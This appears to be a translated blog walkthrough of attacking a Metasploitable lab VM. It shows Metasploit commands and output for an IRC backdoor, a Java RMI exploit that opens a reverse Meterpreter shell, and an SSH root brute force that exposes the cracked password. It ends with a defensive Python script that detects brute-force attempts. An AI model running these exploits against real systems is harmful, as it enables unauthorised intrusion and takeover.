[*] 192.168.22.134:6667 - Connected to 192.168.22.134:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.22.134:6667 - Sending backdoor command...
[*] Command shell session 1 opened (192.168.22.137:4444 -> 192.168.22.134:59370) at 2021-02-06 12:32:48 +0800
whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:dd:32:05
inet addr:192.168.22.134 Bcast:192.168.22.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fedd:3205/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500
......
9. Java RMI server command execution vulnerability: port 1099 open
Start Metasploit and enter the command "search java_rmi_server" in the terminal to search for RMI-related tools and payloads.
msf6 > search java_rmi_server
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner
1 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/misc/java_rmi_server
Enter the command "use exploit/multi/misc/java_rmi_server" in the terminal to enable the exploit module; the prompt changes to show that module path.
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
Enter "show options" in the terminal to see the items that need to be set; "yes" marks the parameters that must be filled in.
msf6 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.22.137 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
Enter "set RHOST 192.168.22.134" in the terminal to set the target host's IP address.
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
Enter "exploit" in the terminal to launch the attack; once it succeeds, a session is established.
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.22.137:4444
[*] 192.168.22.134:1099 - Using URL: http://0.0.0.0:8080/hwZJA66Q
[*] 192.168.22.134:1099 - Local IP: http://192.168.22.137:8080/hwZJA66Q
[*] 192.168.22.134:1099 - Server started.
[*] 192.168.22.134:1099 - Sending RMI Header...
[*] 192.168.22.134:1099 - Sending RMI Call...
[*] 192.168.22.134:1099 - Replied to request for payload JAR
[*] Sending stage (58125 bytes) to 192.168.22.134
[*] Meterpreter session 2 opened (192.168.22.137:4444 -> 192.168.22.134:50234) at 2021-02-06 12:55:37 +0800
[*] 192.168.22.134:1099 - Server stopped.
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40666/rw-rw-rw- 4096 dir 2012-05-14 11:35:33 +0800 bin
40666/rw-rw-rw- 1024 dir 2012-05-14 11:36:28 +0800 boot
......
meterpreter > ifconfig
Interface 1
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.22.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fedd:3205
IPv6 Netmask : ::
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.22.134 - Meterpreter session 2 closed. Reason: User exit
10. Tomcat management console default-password vulnerability: port 8180 is open, running Apache Tomcat/Coyote JSP engine 1.1
Principle: after the Tomcat management console is installed, the default admin account must be changed promptly and weak passwords avoided; anyone who logs in successfully can deploy arbitrary web applications, including webshells.
Affected systems/software: Tomcat
1. Visit 192.168.22.134:8180 and choose Tomcat Manager


2. Next a trojan would have to be uploaded to obtain a webshell; I don't know how to do that yet and will continue once I have worked it out

11. Root user weak-password vulnerability (SSH brute force): the SSH service is running on port 22
Start the MSF console and enter the command "search ssh_login" in the terminal to search for ssh_login-related tools and payloads.
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Enter the command "use auxiliary/scanner/ssh/ssh_login" in the terminal to enable the module; the prompt changes to show that module path.
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) >
Enter "show options" in the terminal to see the items that need to be set; "yes" marks the parameters that must be filled in.
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
Enter "set RHOST 192.168.22.134" in the terminal to set the target host's IP address.
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
Enter "set USERNAME root" in the terminal to specify root as the login username.
msf6 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
Enter "set PASS_FILE <path>" in the terminal to set the path of the password file used for brute-forcing.
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file root_userpass.txt
pass_file => root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file root_userpass.txt
userpass_file => root_userpass.txt
Enter "set THREADS 50" in the terminal to set the number of brute-force threads to 50.
msf6 auxiliary(scanner/ssh/ssh_login) > set threads 50
threads => 50
Enter "run" in the terminal to start brute-forcing the target's SSH login account and password; the account is root and the password is gzt041057.
msf6 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.22.134:22 - Success: 'root:gzt041057' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (192.168.22.137:45913 -> 192.168.22.134:22) at 2021-02-06 13:52:04 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Enter "ssh root@192.168.22.134" in the terminal to connect to the target host.
msf6 auxiliary(scanner/ssh/ssh_login) > ssh root@192.168.22.134
[*] exec: ssh root@192.168.22.134
The authenticity of host '192.168.22.134 (192.168.22.134)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.22.134' (RSA) to the list of known hosts.
root@192.168.22.134's password:
Last login: Fri Feb 5 23:51:57 2021 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
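What the ssh_login run above looks like on the target is a burst of "Failed password" lines from one source followed by an "Accepted password for root". The following Python is an added example, not part of the original post: it groups sshd auth.log events per source IP, flags a burst of failures inside a time window, and flags a success that follows such a burst. The log lines are constructed and the thresholds are assumed policy values.

```python
"""Detect the SSH password-guessing pattern from the ssh_login run above.

Added example, not from the write-up. AUTH_LOG is constructed to resemble
the target's sshd logging during such a run; FAIL_THRESHOLD and
WINDOW_SECONDS are assumed policy values.
"""
import re
from collections import defaultdict
from datetime import datetime

AUTH_LOG = """\
Feb  6 13:51:58 metasploitable sshd[4001]: Failed password for root from 192.168.22.137 port 45880 ssh2
Feb  6 13:51:58 metasploitable sshd[4002]: Failed password for root from 192.168.22.137 port 45881 ssh2
Feb  6 13:51:59 metasploitable sshd[4003]: Failed password for root from 192.168.22.137 port 45882 ssh2
Feb  6 13:51:59 metasploitable sshd[4004]: Failed password for invalid user admin from 192.168.22.137 port 45883 ssh2
Feb  6 13:52:00 metasploitable sshd[4005]: Failed password for root from 192.168.22.137 port 45884 ssh2
Feb  6 13:52:04 metasploitable sshd[4030]: Accepted password for root from 192.168.22.137 port 45913 ssh2
Feb  6 14:10:11 metasploitable sshd[4101]: Accepted publickey for msfadmin from 192.168.22.129 port 50122 ssh2
"""

LINE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                  r"(Failed|Accepted) (\w+) for (?:invalid user )?(\S+) from (\S+) port \d+")

FAIL_THRESHOLD = 5     # failures from one source inside WINDOW_SECONDS
WINDOW_SECONDS = 60


def parse_auth_log(text, year=2021):
    """Return (timestamp, outcome, method, user, source_ip) per sshd auth line."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; the caller supplies it
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        events.append((ts, m.group(2), m.group(3), m.group(4), m.group(5)))
    return events


def detect(events):
    """Return findings: failure bursts per source, successes after a burst,
    and root logins by password (a PermitRootLogin / PasswordAuthentication issue)."""
    findings = []
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[4]].append(ev)
    for src, evs in by_src.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "Failed"]
        burst_at = None
        # sliding window: FAIL_THRESHOLD consecutive failures within the window
        for i in range(len(fails)):
            j = i + FAIL_THRESHOLD - 1
            if j < len(fails) and (fails[j][0] - fails[i][0]).total_seconds() <= WINDOW_SECONDS:
                burst_at = fails[j][0]
                break
        if burst_at is not None:
            findings.append(f"{src}: {len(fails)} failed logins, threshold reached at {burst_at:%H:%M:%S}")
            for e in evs:
                if e[1] == "Accepted" and e[0] >= burst_at:
                    findings.append(f"{src}: '{e[3]}' accepted via {e[2]} after a guessing burst; "
                                    "treat the account as compromised")
    for ts, outcome, method, user, src in events:
        if outcome == "Accepted" and user == "root" and method == "password":
            findings.append(f"{src}: root password login at {ts:%H:%M:%S}; "
                            "set PermitRootLogin no and PasswordAuthentication no")
    return findings


if __name__ == "__main__":
    for f in detect(parse_auth_log(AUTH_LOG)):
        print("FINDING:", f)
```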
Please credit the source when reposting. Link to this article: https://www.uj5u.com/qita/257397.html